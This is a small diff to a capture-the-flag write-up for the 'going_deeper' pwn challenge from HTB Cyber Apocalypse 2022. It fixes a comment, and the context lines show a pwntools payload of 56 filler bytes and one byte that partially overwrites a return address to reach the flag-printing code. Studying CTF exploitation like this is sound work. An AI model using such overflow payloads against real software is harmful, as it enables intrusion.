Cjreek/Writeups/ctf/htb_cyber_apocalypse_2022/pwn/going_deeper.md

 r.sendline(b"1")
 r.recvrepeat(0.1)

-# send payload to jump the code printing the flag at 0x00400b12
+# send payload to jump to the code printing the flag at 0x00400b12
 payload = b"A"*56 # put anything for the first 56/57 bytes
 payload += b"\x12" # change one byte of the return address to point to the system() call printing the flag r.sendline(payload)